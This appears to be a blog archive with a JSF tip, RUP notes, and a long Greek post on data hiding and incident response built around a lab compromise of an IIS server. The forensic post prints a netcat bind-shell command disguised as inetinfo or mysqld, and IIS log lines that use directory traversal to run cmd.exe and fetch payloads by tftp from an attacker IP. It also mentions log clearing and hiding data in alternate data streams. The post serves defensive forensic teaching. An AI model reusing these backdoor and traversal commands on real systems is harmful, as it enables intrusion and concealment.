Nanoagent's Blog

How to get in JSF url parameters

2009-02-26T20:00:00.003+01:00

How to get in JSF url parameters

lets consider the following example:
http://mysuperapp.com/appname?mygetparam=program1
http://mysuperapp.com/appname?mygetparam=program2
http://mysuperapp.com/appname?mygetparam=program3

Bind GET parameters to your backing bean. (Just putting them in the url is cludgy)

All you have to do is use the param object in your el expression:

myBean

com.mysuperapp.MyBean

request

myPropery

#{param.mygetparam}

Now your request scope backing bean has the value from the url.

Social Entrepreneurship: Creating Change

2009-02-22T13:41:00.000+01:00

Incident preparation & responce

2009-01-25T15:33:00.011+01:00

Normal 0 false false false EL X-NONE X-NONE

Data Hiding

The easiest way to hide data on a windows machine is by simply renaming the file extension.

In windows , unlike linux, this will change the icon of the file.

Έτσι,ενα οποιοδήποτε αρχείο μπορεί να μετονομαστεί σε .dll και να μπει στο κατάλογο %WINDIR%\system32 , γεγονός που κάνει την εύρεση του αρχείου αρκετά δύσκολη ακόμα και για πολύ έμπειρους διαχειριστες συστημάτων. Πόσο μάλλον αν το μετονομασμένο αρχείο έχει μετονομαστεί σε msodbc32.dll.

Στα windows τα associations των αρχειών μπορούν να εμφανιsτουν με την εντολή assoc

Για να ενισχύσουμε το παραπάνω επιχείρημα ας δούμε το παρακάτω παράδειγμα:

C:\intepub\>inetinfo –L –d –p 80 –e cmd.exe

Εκτελώντας το «netstat –an» φαίνεται ότι η πόρτα 80 είναι ανοιχτή και σας περιμένει, και απο τον τασκ μανατζερ οτι τρέχει η εφαρμογή inetinfo. Αυτή η πληροφορία θα μπορούσε να ξεγελάσει ένα διαχειριστή μέχρι να δοκιμάσει να συνδεθεί με ένα φυλομετρητή(Browser). Επειδή το NetCat δεν είναι web server απλά δεν θα γυρίσει το αναμενόμενο html αποτέλεσμα. Περαιτέρω ανάλυση απο το διαχειριστή θα δείξει ότι το service του web server δεν τρέχει και ότι μόλις συνδεθεί κάποιος με netcat se client mode θα του εμφανιστεί μια κονσόλα.

Ο μοναδικός τρόπος που μπορεί να περιορίσει τέτοια προβλήματα είναι με τη σωστές πολιτικές ασφαλείας, με τη χρήση δικαιωματων, καθως και με τα Access Control Lists(ACL)

Έτσι, αν ο χρήστης δεν έχει δικαιώματα να γράψει στο κατάλογο system32 , τότε απλα δεν θα γραφεί τίποτα σε αυτόν το κατάλογο, εμποδίζοντας έτσι την εγκατάσταση malware ή /και malicious actions.

Τρόποι αντιμετώπισης της πρακτικής μετονομασίας είναι η ανάλυση της υπογραφής των αρχείων file signature analysis ή με baseline scan.

Ένα άλλος τρόπος είναι με την χρήση των attributes των αρχείων με την εντολή attrib –h όπου κρύβει το αρχείο . Η λύση πολύ απλή . View hidden files ή απο κονσόλα dir /ah

Αλλοι τρόποι αποκρυψης δεδομένων.

File segmentation

Άλλος ένας τρόπος για την αποκρυψη δεδομένων σε ενα live συστημα είναι ο τρόπος της κατάτμησης δεδομένων. Αυτή η τεχνική υπάρχει απο τις παλίες εποχές του DOS όπου αν ένα αρχείο δεν χώραγε σε μια δισκέττα χωριζόταν σε πολλές και μετα ξαναενωνόταν.

Με τη χρήση αυτής της τεχνικής μπορούν να κρυφτούν αρχεία σε διάφορα μέρη ή και ακόμα στο τέλος άλλων αρχείων ή και σαν κλειδιά binary στη registry.

File Binding

To file binding είναι η μέθοδος δυαδικής ένωσης δυο αρχείων. Χωρίς το ένα να επηρεάζει το άλλο. Ο τρόπος λειτουργίας του είναι απλός, εκτελώντας το ένα αρχείο εκτελείται και το δευτερο.(ELITEWRAP)

NTFS Alternate Data Streams

TO NTFS είναι το προτεινόμενο filesystem των windows με πολλά πλεονεκτήματα έναντι του παλιού FAT όπως τα δικαιώματα ανα κατάλογο κτλ.

ΤΟ NTFS (όπως και της apple to HFS)αποτελείται απο δύο κομμάτια ένα Master File Table (MFT) και τα επιπρόσθετα attributes ή πιο συγκεκριμενα εναλλακτικες ροές δεδομένων.

Για την καλύτερη κατανόηση τι είναι οι εναλλακτικές ροές δεδομένων ας δούμε το παρακάτω παράδειγμα.

Echo “This is the normal file, main data stream” > example.txt

Echo “This is an alternate data stream” > example.txt:ads.txt

Ta ADS είναι κρυφά απο τη εντολή dir των windows.

(LIVE DEMO)

TA ADS είναι viewable απο third party προγράμματα όπως foundstone sfind.exe, sysinternals streams.exe, frank heyne’s lads.exe

Hiding data in the registry

H Registry είναι ένα ακόμα μερος που μπορουν να κρυφτούν δεδομένα σε διάφορα formats. Ακόμα και ολόκληρα (μικρα σχετικα σε μέγεθος)προγραμματα μπορουν να αποθηκευτουν σε binary strings, τα οποία strings μπορούν με τη σειρά τους να γίνουν segmented .

Steganography

Η γνωστή σε όλους τέχνη της απόκρυψης δεδομένων σε «εμφανή» σημεία όπως μέσα σε φωτογραφείες.

Windows File Protection (WFP)

To WFP προστατεύει την ακεραιότητα διαφόρων αρχείων του συστήματος. Αν κάποιο πρόγραμμα επιχειρήσει την τροποποίηση ή διαγραφή ενός τέτοιου αρχείου τότε αυτή η ενέργεια καταγράφεται στα logs και ταυτόχρονα το οριτζιναλ αρχείο γίνεται reload .

Ωστόσο τα windows δεν θα αντιδράσουν καθόλου αν σε κάποιοα πο τα αρχεία που προστατεύουν προστεθεί ένα ADS. ‘Eτσι, όχι μόνο δεν φαίνονται τα ADS, αλλα πέρα του ότι τα windows δεν προστατεύουν απο εναλλακτικές ροές τα αρχεία του συστήματος , δεν ειδοποιούν ούτε τον διαχειριστή σε με τέτοια αλλαγή.

Incident Preparation

Προκειμένου να ολοκληρωθεί η προετοιμασία για ένα περιστατικό, πρέπει να γνωρίζουμε τα παρακάτω:

· Καλή γνώση του λειτουργικου που διαχειριζόμαστε

· Κατανόηση του τι προστατεύουμε

· Επιβεβαίωση αποκλεισμού όλων των πιθανών διόδων

· Επιβεβαίωση προετοιμασίας άμυνας σε επίπεδα

· Παρακολούθηση της άμυνας για πρόωρα σημάδια ενος περιστατικού

Τα παραπάνω θα πρέπει να υποστηριχθούν απο αυστηρές πολιτικές ασφαλείας καθώς και απο αυστηρούς κανόνες σε firewalls και access control lists.

Incident Response Tools

1. Volatile Data

Στα Volatile Data υπάρχει συνήθως ένας πλούτος πληροφοριών που μπορούμε να χρησιμοποιήσουμε για να αποφασίσουμε αν έγινε ή όχι κάποιο περιστατικό.

Τα Volatile Data αποτελούνται συνήθως από:

· Ώρα συστήματος

· Συνδεδεμένοι χρήστες

· Πληροφορίες για κάθε process

· Δικτυακές συνδέσεις

· Κατάσταση δικτύου

· Τα περιεχόμενα του clipboard

· Ιστορικό εντολών

· Δεδομένα φορτωμένα στη μνήμη απο διάφορες υπηρεσίες ή/και προγράματα που εκτελούνται

· Πληροφορίες υπηρεσιών και οδηγών

Σε περίπτωση ενός incident o forensic analyst ή ο investigator πρέπει να φτιάξει ένα χρονοδιάγραμμα της δραστηριότητας του συστήματος.

Βασική προυπόθεση και πρώτο βήμα είναι να πάρει την τρέχουσα ημερομηνία και ώρα του συστήματος υπο έλεγχο. Στη συνέχεια πρέπει να παρθούν πολύ προσεχτικά απο κάθε ύποπτο αρχείο τα στοιχεία της ώρας γνωστα και σαν MAC. Times(Modified,Accessed,Created) in dos this can be achived via dir /t command και διαφορα αλλα διακοπτάκια (δηλαδή 3 φορές ) για κάθε αρχείο.

Utility : MACTimes.exe

Σε περίπτωση ανάλυσης ενός συστήματος σε λειτουργία , ο διαχειριστής θέλει να μάθει ποίοι είναι συνδεδεμένοι στο σύστημα.

Utilities : psloggedon.exe, netusers.exe , net.exe session(windows native)

Ενα σύστημα σε λειτουργία , βασίζεται σε λειτουργία τουλάχιστον κάποιων υπηρεσιων και κάποιων processes. Κάθε μια απο αυτές τις processes έχει κάποια χαρακτηριστικα που σχετίζονται με αυτήν και είναι σημαντικά για τον forensics investigator.

Για κάθε process μπορούμε να ανακαλύψουμε τα παρακάτω:

· Ποιο εκτελέσιμο αρχείο είναι

· Παράμετροι που χρησιμοποιήθηκαν για την αρχικοποίηση του

· Πόση ώρα εκτελείται

· Σε τι(καν αν)security context ασφαλείας τρέχει

· Τι modules ή ποίες βιβλιοθήκες έχει χρησιμοποιήσει

Έτσι μπορεί ο αναλυτής του συστήματος να αντιληφθεί αν και ποιο απο τα εκτελέσιμα είναι valid ή όχι.

Utilties: pslist.exe, pulist.exe, listdll.exe, handle.exe, tlist.exe(MS Debugging Tools),ps.exe,cmdline.exe

Μόλις βρεθεί κάποια process που φαίνεται ύποπτη, ο αναλυτής μπορεί να μαζέψει παραπάνω πληροφορίες για την process, πριν την τερματίσει. Η μνήμη που χρησιμοποιήται απο την συγκεκριμένη process μπορεί να περιέχει πληροφορίες χρήσιμες για τον αναλυτή,όπως κωδικοί , διευθύνσεις IP, άλλες απομακρυσμένες συνδέσεεις κτλ.

Utility: pmdump .exe(για να αναλυθεί αργότερα το dump file με strings.exe ή με ένα hex editor), dd.exe

Για πληροφορίες σχετικά με το configuration των network interfaces χρησιμοποιούμε το προγραμμα ipconfig (windows native) ή το iplist.exe

Για τον έλεγχο αν κάποιο network interface στο ύποπτο μηχάνημα τρέχει σε promiscuous mode υπάρχει το promiscdetect.exe

Για διαφορα στατιστικα προτοκόλλων , διευθύνσεις και δικτυακές συνδέσεις υπάρχει η εντολή “netstat –an “

Επόμενο σημαντικό βήμα είναι η αντνιστοίχηση των ανοιχτών ports με τις εφαρμογές που τα άνοιξαν. Να σημειώσουμε οτι πριν τα “windows XP” δεν υπήρχε αυτή η δυνατότητα natively στα windows.

Utilities : netstat –ano , openports.exe, fport.exe

Για πληροφορίες σχετικά με συνδέσεις netbios υπάρχει το nbtstat.

Επίσιης πολλές πληροφορίες μπορούν να συλλεχθούν με την εντολή ΝΕΤ και τις διάφορες παραμέτρους της όπως share ,session,file.

Σαν ελάχιστο οαναλυτής θα πρέπει να εκτελέσει τα παρακάτω προγραμματάκια :

· Iplist.exe

· Promiscdetect.exe

· Openports.exe (2 φορές με –fport kai –netstat switches)

· Nbtstat.exe

Για τα περιεχόμενα του clipboard υπάρχουν τα unxutils , για ιστορικό εντολών κονσόλας ,doskey /h

Volatile πληροφορίες μπορούν να συλλεχθούν και απο τις τρέχουσες υπηρεσίες. Για παράδειγμα αν μια υπηρεσία ξεκίνησε χειροκίνητα.

Utilities : drivers.exe, sc.exe, driverquery,

To συγκεκριμένο Group policy object (GPO) είναι επίσης χρήσιμο καθώς μπορεί να έχει στοιχεία για το πώς ήταν configured ένα σύστημα ή ακόμα και πως προσπεράστηκε η ασφαλειά του.

Utilities : GPList.exe, GPResult.exe

Τέλος μια υπηρεσία των windows είναι η protected storage για ευαίσθητα δεδομένα (πολύ κλειστό απο την Microsoft)

Utilities: pstoreview.exe

Linux equivalent tools : netstat, lsof, rpc.statd, mount ,df ,md5sum,dd ,history

2. Non Volatile Data

· Συλλογή Non Volatile Data ,για αναζήτηση αρχείων μέσα σε μια συγκεκριμένη ημερομηνία χρησιμοποιούμε το macmatch.

· Ανάκτηση δικαιωμάτων σε αρχεία με την εντολή cacls

· Για τον υπολογισμό md5 hash για όλα τα αρχεία md5deep.exe

· Binary information gathering showbinarymfr.exe

· Αναλυση των περιεχομένων tου recycle bin με το rifiuti.exe

· Command line registry search, reg.exe . Ιδιαίτερα σημαντικά είναι το κλειδί lastwrite

· Eventlog dump, auditpol.exe, dumpel.exe, eventCombMT.exe, psloglist.exe

· Tools for analyzing files, strings.exe, bintext, hexeditor,depends.exe,ftde

Incident Response

Μέχρι τώρα αναλύσαμε τα εργαλεία που θα χρειαζόμασταν για την αντιμετώπιση ενός περιστατικού. Τώρα θα αναλύσουμε πως θα ταχρησιμοποιήσουμε και πώς θα καταγράφουμε (document)την κάθε μας κίνηση προκειμένου να μπορούμε αργότερα να απαντήσουμε σε σχετική ερώτηση με λεπτομέρεια εαν χρειαστεί.

Ο καλύτερος τρόπος για την καταγραφή των στοιχείων και τη συλλόγη τους και αποφυγή λαθών κατα τη διάρκεια της εκτέλεσης της forensic ανάλυσης είναι η υλοποίηση της όλης διαδικασίας σαν μεθοδολογία.

Ψάχνοτας στο διαδύκτιο για τέτοιες μεθοδολογίες παρατήρησα ότι συχνά πολλοί διαχειριστές δεν έχουν μια ξεκάθαρη μεθοδολογία που ακολουθουν.[1,2,3]

Επίσης έχει παρατηρηθεί ότι σε περίπτωση ενός περιστατικού, όπου δηλαδή γίνει μια πετυχημένη επίθεση , ο διαχειριστής απλά ξαναφορτώνει το λειτουργικό απο ασφαλές μέσο. Αυτή η κίνηση όμως είναι καταδικασμένη σε αποτυχχία.

Εφόσον δεν βρέθηκε ο λόγος ή ο τρόπος(Root cause Analysis – RCA), πώς δηλαδή εισέβαλε κάποιος στο σύστημα, προκειμένου να παρθούν τα ανάλογα μέτρα ασφάλισης του συστήματος απο παρόμοιες μελλοντικές επιθέσεις, τότε είναι σίγουρο οτι θα ξαναγίνει.

Επίσης σε περίπτωση μη ανάλυσης του συστήματος του οποίου έγινε επιτυχής επίθεση, δεν θα υπάρχουν αποδείξεις του τι έγινε , ποτε, πως ,απο που και απο ποιόν; Αυτό συνήθως οδηγεί σε εκτιμήσεις για την συμπλήρωση των κενών.

Όταν μαζεύουμε στοιχεια σε μια έρευνα δεν πρέπει να υποθέτουμε τίποτα. Οι αποφάσεις οι οποίες θα παρθούν πρέπει να βασίζονται σε γεγονότα με δυνατά στοιχεία και αποδείξεις.

Δυστυχώς όταν μιλάμε για ασφάλεια δεν υπάρχει κάποιο λογισμικό ή κάποιος χρυσός κανόνας που θα κρατήσει κάποιο σύστημα απαραβίαστο.

Ότιδήποτε γίνεται σαν μέρος της ανάλυσης ενος συστήματος πρέπει να καταγράφεται. Οποιαδήποτε εντολή εκτελέστηκε με τις ακριβείς παραμέτρους πρεπει επίσης να καταγράφεται για λόγους επαλήθευσης (αν χρειαστεί).

Επίσης , έτσι δημιουργείται ένα ιστορικό που επιτρέπει σε οποιονδήποτε να ακολουθήσει τα βήματα που έγιναν με λεπτομέρεια.

Για παράδειγμα, αντί να δηλωθεί ότι έγινε έλεγχος στα Audit settings, θα πρέπει να γραφτεί πώς έγινε ο έλεγχος ,συμπεριλαμβανομένου εντολών που χρησιμοποιήθηκαν με τις συγκεκριμένες παραμέτρους, ή ποια γραφικά περιβάλλοντα χρησιμοποιήθηκαν .

Επιπροσθέτως, καταγράφοντας την κάθε κίνηση με λεπτομέρεια , όχι μόνο επιτρέπει σε κάποιον τρίτο να ακολουθήσει τα βήματα μας / τη μεθοδολογία μας, αλλα ακόμα πιο σημαντικό, επιτρέπει και πιθανές βελτιώσεις στη μεθοδολογία μας.

Τα εργαλεία που βρίσκονται στο ύποπτο μηχάνημα δεν είναι εμπιστοσύνης καθώς μπορει να έχουν αλλαχτεί. Θα πρέπει να χρησιμοποιήσουμε τα τα αντιστοιχα προγράμματα απο ένα μέσο ανάγνωσης μόνο.

Κατα τη διάρκεια ενός incident response δεν πρέπει να γράφονται αρχεία στο σκληρό δίσκο του ύποπτου μηχανήματος, αλλα αυτό μπορεί να εξαρτάται και απο τις πολιτικές τις εκάστοτε εταιρίας/οργανισμού. Αν ο σκόπός των πολιτικών είναι να διατηρηθεί η ακαιρεότητα του μηχανήματος ενώ ταυτόχρονα να μειώνεται στο ελάχιστο η offline λειτουργία του, δεν πρέπει να καταγράφεται τίποτα στο σκηρό δίσκο και θα πρέπει να αναζητηθούν άλλοι τρόποι για την διατήρηση και μεταφορά των (προς συλλογή)δεδομένων.

Επιπλέον είναι σημνατικο να γνωρίζουμε τι εφαρμογές, τι υπηρεσίες τρέχουν στο σύστημα καθώς και τι αρχικοποίηση (configuration) είχε. Έτσι πιθανόν να εντοπίσουμε ευκολότερα τα έγκυρα προγράμματα και υπηρεσίες.

Όταν ελέγχουμε αρχεία σε ενα σύστημα , ανοίγοντάς τα, τους αλλάζουμε τη last accessed ημερομηνία καταστρέφοντας έτσι πολύτιμα στοιχεια.

Κατα την αρχίκοποίηση ενός συστήματος ,οι καλύτερες πρακτικές(best practices) προτρέπουν την αφαίρεση αχρείαστων πηγών, υπηρεσίες καθώς και εκτελέσιμων αρχείων απο το σύστημα. Επίσης το συστημα θα πρέπει να είναι πληρως αναβαθμισμενο σχετικά με τις τελευταίες αναβαθμίσεις του λειτουργικού, security settings καθώς και πολιτικές ασφαλείας.

Τα βήματα λοιπόν που ακολουθήθηκαν για την ανάλυση του ύποπτου μηχανήματος ήταν τα εξής: (καταγραφη)

· Τρέχουσα Ημ/νια και ώρα του ύποπτου συστήματος

· Αναλυτικά ποιοι χρήστες είναι συνδεδεμένοι με το σύστημα

· Τι εφαρμογές τρέχει ο κάθε χρήστης

· Αναλυτικα τι πόρους χρσιμοποιει η κάθε εφαρμογή

· Ποιες βιβλιοθήκες έχει φορτώσει και ποια modules

· Ποιες πόρτες έχει ανοίξει η κάθε εφαρμογή

· Παράμετρους αρχικοποίησης της εφαρμογής και ώρα εκτέλεσης

· Δυκτιακές πληροφορίες όπως πίνακας δρομολογητών,στατιστικά σύνδεσης, ip του μηχανήματος , DNS,DHCP,subnet

· Promiscuous mode detection

· Memory dumps(either per process or full memory dump)

· HD Image(for analysis)

Το σενάριο

Απο το μηχάνημα Α έγινε scanning για web server vulnerabilities.(witko). Βρέθηκε το συγκεκριμένο μηχάνημα έτρεχε IIS με εγκατεστημένη μια έκδοση του frontpage server extensions , η οποία δεν είχε τα τελευταία updates , και άφηνε ανοιχτή την πρόσβαση στο κατάλογο ( /scripts/ καθώς και στο κατάλογο /_vti_bin/ )και ποιο συγκεκριμένα στο αρχείο fpcount.exe, αδυναμίες που μπορούν να οδηγήσουν σε εκτέλεση εντολών του συστήματος . Επίσης, απο τον server έλειπαν μερικά κρίσημα patches που με την χρήση του παλιού directory traversal exploit με την χρήση Unicode χαρακτηρων θα επέτρεπε σε κάποιον κακόβουλο χρήστη να σηκώσει το tftp και να κατεβάσει μερικά αρχεία στο σύστημα. Στη συνέχεια και εκμεταλλευόμενςο τα προαναφερθέν exploits, εγκατέστησα μια custom υπηρεσία (με όνομα Windows Sec Center)η οποία αυτόματα σήκωνε το netcat σε listening mode sto port 3303, και μία δική μου custom εφαρμογή (με ψεύτικο όνομα apache.exe)sto port 8080^η στην οποία αν συνδεόταν κάποιος με ένα browser και δεν πέρναγε παράμετρο που να ξεκινάει απο cmd τότε του γύρναγε σε html τη default σελίδα του apache, απλα δηλαδή ένα μήνυμα που να λέει success. Τέλος εκτελέσα το clearlogs.exe για να διαγράψω τα ίχνη μου απο τα windows event logs.

Network Setup

Target/Suspect Machine (A) IP:192.168.227.186 (Win2K – IIS 5)

Forensic Server (B) IP:192.168.227.185

Attacker Machine (C) IP:192.168.227.130

Forensic Analysis

Όπως αναφέραμε και προηγουμένως ,στη διαχείριση περιστατικού, πρέπει να υπάρχει μια σταθερή μεθοδολογία που θα ακολουθείται σε τέτοιες περιπτώσεις.

Για παράδειγμα ο πιο ασφαλής τρόπος εκτέλεσης των εντολών που μαζέυουν πληροφορίες είναι με την χρήση ενός script που θα τις εκτελέσει όλες μαζί. Αποφεύγοντας έτσι τυχόν τυπογραφικά λάθη (και χάσιμο πολύτιμου χρόνου σε ένα live σύστημα)και κάνοντας τα πάντα σωστά με τη πρώτη. Αυτό πάλι ίσως να βολέυει για κάποιο τοπικό αποθευτικό μέσο(usb stick). Αν όμως θέλουμε να τα αποστείλουμε κατευθείαν μέσω δικτύου για ανάλυση σε ένα άλλο μηχάνημα; Το netcat (θα μπορούσε να προσφέρει μια λύση) θα έσωζε όλα ταδεδομένα σε ένα αρχείο δυσκολέυοντας έτσι τη διαδικασία ανάλυσης των δεδομένων. Μια καλύτερη επιλογή θα ήταν κάτι σαν το netcat το οποίο θα μπορούσε να σώσει κάθε session σε ξεχωριστό αρχείο με βάση την εντολή που εκτελέστηκε(υλοποιήθηκε σαν μέρος της μεταπτυχιακής).

Εκτελώντας την εντολή 4nsiccli CommandListFile remoteHost port(Windows)

Εκτελεί τις εντολές που προαναφέρθηκαν για συλλογή πληροφοριών volatile ή/και non volatile δεδομένων.

Αφού συλλέξουμε τις πληροφορίες volatile ή/και non volatile δεδομένων το επόμενο βήμα είναι η ανάλυση.

Εκτελώντας την εντολή 4nsiccli defvolcmd.txt 192.168.227.185 888 απο το μηχάνημα Α, αν ρίξουμε μια ματιά στο μηχάνημα Β στον υποκατάλογο ForensicsAnalysis\192.168.227.186 θα δούμε ένα αρχείο για κάθε εντολή που εκτελέστηκε.

Ρίχνοντας μια γρήγορη ματιά στο αρχείο fport.exe.txt βλέπουμε τις παρακάτω ύποπτες γραμμές.

2180 mysqld -> 3306 TCP C:\Program Files\xampp\mysqld.exe

2360 apache -> 8080 TCP C:\Program Files\xampp\apache.exe

Φυσικά σαν διαχειριστής του server A δεν έβαλα ποτέ τον apache ή/και την mysql .

Στη συνέχεια ανοίξαμε το αρχείο handle.txt για να δούμε τι άλλες πληροφορίες μπορούμε να μαζέψουμε για αυτές τις δύο περίεργες processes.

mysqld.exe pid: 2180 BLINK\vgorgas

C: File (RW-) C:\Program Files\xampp\

------------------------------------------------------------------------------

Windows Sec CenterSvc.exe pid: 5940 BLINK\vgorgas

788: Section \BaseNamedObjects\ShimSharedMemory

794: C: File (RW-) C:\Program Files\xampp\

7A8: File (RW-) C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.2982_x-ww_ac3f9c03

------------------------------------------------------------------------------

apache.exe pid: 2360 BLINK\vgorgas

6BC: File (R-D) C:\WINDOWS\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp

6C4: File (R-D) C:\WINDOWS\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp

6E8: File (R-D) C:\Program Files\xampp\MScThesisForensicsTools.dll

6EC: File (R--) C:\WINDOWS\assembly\pubpol14.dat

6F4: File (RW-) C:\WINDOWS\WinSxS\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.762_x-ww_6b128700

6FC: File (R--) C:\WINDOWS\assembly\NativeImages_v2.0.50727_32\index175.dat

740: File (R-D) C:\Documents and Settings\vgorgas\Application Data\Microsoft\CLR Security Config\v2.0.50727.42\security.config.cch

744: File (RW-) C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.2982_x-ww_ac3f9c03

74C: File (R-D) C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch

750: File (R-D) C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch

784: File (RW-) C:\Program Files\xampp\

7AC: Section \BaseNamedObjects\Cor_Private_IPCBlock_2572

7B0: Section \BaseNamedObjects\Cor_Public_IPCBlock_2572

7BC: File (RW-) C:\WINDOWS\WinSxS\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.762_x-ww_6b128700

7D4: Section \BaseNamedObjects\ShimSharedMemory

------------------------------------------------------------------------------

Eπίσης κοιτώντας στο Log του cmdline.exe.txt φαίνονται οι εντολές μαζί μ ε τυχόντες παραμέτρους που εκτελέστηκαν

2180 - C:\Program Files\xampp\mysqld.exe

C:\Program Files\xampp\mysqld.exe -L -d -p 3306 -e cmd.exe

2360 - C:\Program Files\xampp\apache.exe

C:\Program Files\xampp\apache.exe 8080

5490 - C:\Program Files\xampp\ Windows Sec CenterSvc.exe

C:\Program Files\xampp\ Windows Sec CenterSvc.exe

Επίσης εκτελώντας την εντολή pslist.exe πήραμε το παρακάτω αποτέλεσμα:

Process information for BLINK:

Name Pid Pri Thd Hnd Priv CPU Time Elapsed Time

Mysqld 2180 8 37 482 73884 0:5:02.437 1:58:57.390

apache 2360 8 16 687 61140 0:07:01.562 1:58:57.125

Στο συγκεκριμένο server (Α) έτρεχαν 2 υπηρεσίες, HTTP και mail .

Δύο υπηρεσίες με μεγάλο ιστορικό επιθέσεων. Ωστόσο έχει παρατηρηθεί ότι τελευταία υπάρχει αυξανόμενη τάση επιθέσεων στους web servers. Διάφορες στατιστικές μελέτες λένε ότι το μεγαλύτερο ποσοστό επιθέσεων (με αυξητικές τάσεις) γίνεται σε web servers .

Οπότε η επόμενη κίνηση ήταν να ελένξω τα logs του web και mail server. Επέλεξα να ξεκινήσω απο τα logs του web server καθώς και να ψάξω για περίεργα αρχεία μέσα στους υποκαταλόγους του IIS

Στα logs του IIS βρήκα τα τις εξής γραμμές:

GET /scripts/../../windows/system32/cmd.exe /c+tftp+192.168.227.130+get+mysqld.exe

GET /scripts/../../windows/system32/cmd.exe /c+tftp+192.168.227.130+get+ MScThesisForensicsTools.dll

GET /scripts/../../windows/system32/cmd.exe /c+tftp+192.168.227.130+get+ap.exe

GET /scripts/../../windows/system32/cmd.exe /c+tftp+192.168.227.130+get+svc.exe

GET /scripts/../../windows/system32/cmd.exe /c+ap.exe

Γράφωντας την εντολή dir /s ap.exe για την αναζήτηση του ύποπτου αρχείου , βρέθηκε στο κατάλογο c:\intepubs\scripts

Σημείωση: Εργαλεία για έλεγχο των αναβαθμίσεων και της σημασίας τους για το σύστημα

Microsoft baseline security analyzer (MSBA)

Ελέγχοντας τις ημερομηνίες και τις ώρες των αρχείων που κατέβηκαν απο τα logs με τις αντίστοιχες ημερομηνίες και ώρες των αρχείων στον κατάλογο c:\program files\xampp παρατηρήθηκε ότι ήταν οι ίδιες.

Επίσης κοιτώντας στη registry στο κλείδι HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run βρέθηκε το κλειδί antivirus με τιμή c:\program files\xampp\apache.exe

Στη συνέχεια έγινε dump της μνήμης που χρησιμοποιούσαν τα παραπάνω processes με την ακόλουθη εντολή:

Pmdump 2360 > g:\mysqld.dmp (To disk/partition g θα μπορούσε να είναι network drive or usbstick)

Pmdump 2180 > g:\apache.dmp

Pmdump 5490 > g:\service.dmp

καθώς αν γινόταν όλη η μνήμη dump θα υπήρχε τεράστιος όγκος πληροφορίας που θα ήθελε πολύ χρόνο για ανάλυση. (και στη προκειμένη περίπτωση δεν χρειαζόταν)

Έχοντας αναλύσει και βρεί πώς έγινε και τι έγινε (κοιτώντας το log netstat.ex.etxt) μπορούμε να βρούμε και απο ποιόν έγινε ,αν είναι ακόμα συνδεδεμένος.

Αν θέλουμε παραπάνω πληροφορίες , για τα αρχεία και τι κάνει το καθένα ξεχωριστά θα πρέπει να μπούμε σε βάθος επιπέδου γλώσσας assembly για τα native binaries όπως το mysqld.exe (netcat) ή σε Microsoft Intermediate Language (MSIL) όπως το apache.exe που είναι σε .NET

Στη συνέχεια και αφού κρατήσουμε αντίγραφο των αρχείων και κάνουμε image to σκληρό δίσκο σβήνουμε τα (ύποπτα) αρχεία, κλείνουμε την υπηρεσία Windows Sec CenterSvc.exe και την σβήνουμε απο υπηρεσία. Τέλος διαγράφουμε απο τη registry τηνη τιμή antivirus.

Επόμενο βήμα είναι να ανοίξουμε τον εξυπηρετητή, να φορτόσουμε όλα τα patches and updates , επιβεβαιώνοντας ότι έχουμε αφαιρέσει τα ύποπτα αρχεία απο το σύστημα.

Τέλος, μπορούμε να πάρουμε τα αρχεια για περαιτέρω ανάλυση έχοντας λύσει το αρχίκο πρόβλημα στον εξυπηρετητη και έχοντας μαζέψει αρκετές πληροφορίες για ανάλυση.

Rational Unified Process

2007-12-23T11:17:00.001+01:00

Inception Phace (Briefly)

1. Understand what to build

a. Determine the vision, the scope , of the system , the system boundaries, that is , whats inside and what is outside the system, Identify who wants to use the system, and what is worth to them

i. Agree on a high level vision

ii. Provide a “mile-wide, inch-deep” description of the system(V. Briefly)

iii. Detail key actors and use cases

2. Provide a vision document

a. The benefits and opportunities that will be provided by building the application

b. The problems that the application will solve

c. Who the target users are

d. At a very high level, what the product will do, expressed as high-level features or in terms of outlining a few key use cases.

e. Some of the most essential nonfunctional requirements such as supported OS’s , database support, required reliability, scalability, and quality as well as licensing and pricing if that is relevant

3. Generate a “mile-wide, inch-deep” description

a. Identify and briefly describe the actors

b. Identify and briefly describe the use cases

c. Identify and describe how will each actor will interact with the system

4. Hold a workshop or brainstorming session

a. Identify as many actors as you can

b. Associate each actor with use cases and provide brief descriptions

c. For each use case determine if it requires interaction with other users or systems. This will help identify additional actors.

d. Continue going back and forth until you think you have identified enough to understand the scope of the system.

e. Write a paragraph describing each actor and a couple of paragraphs for each use case. This can be done in a break where each person is given two hours to describe one actor and two or three use cases

f. Create a glossary containing the “key” items the application deals with

g. Review key items that the system is dealing with , and make sure that you have created use cases that detail how each key item is created, maintained and deleted. Do you have a use case policy that describes how to setup a policy? How to make changes to a policy? How to cancel a policy? This is a great way of discovering holes in your use- case model and spending some time in this activity will save you a lot of time on later stages.

h. Identify the most critical and/or essential use cases (at most approx 20% of your use-cases)

5. Detail Key actors and Use cases

a. Produced a couple pages for each use case (Design)

b. Develop User-Interface Prototypes

c. Time-box the activities to avoid getting bogged down

d. Identify alternative flows of events

6. Identify key system functionality

a. The functionality is the core of the application, or it exercises key interfaces of the system, and will hence have a major impact on the architecture

b. The functionality that must be delivered, the essence of the system

c. The functionality that covers an area of the system architecture that is not covered by any other critical use-case. To ensure that you address all major technical risks , you need to have a good enough understanding of each area of the system

7. Determine at least one possible solution

a. What other similar systems have been built and what technology and architecture did they use? what did you use? What was your cost?

b. In particular for an evolution of a system , is the current architecture still satisfactory or does it need to evolve?

c. What technologies would you have to use within the system? Do you need to acquire any new technologies?

d. What are the costs and risks associated with that

e. What software components are needed within the system (database middleware and so on)?Can they be purchased? Can they be reused from another in-house project? What are the associated risks? What are the estimated costs?

8. Understand the costs, schedule and risks associated with the project (The business case documents ,the economic value of the product)

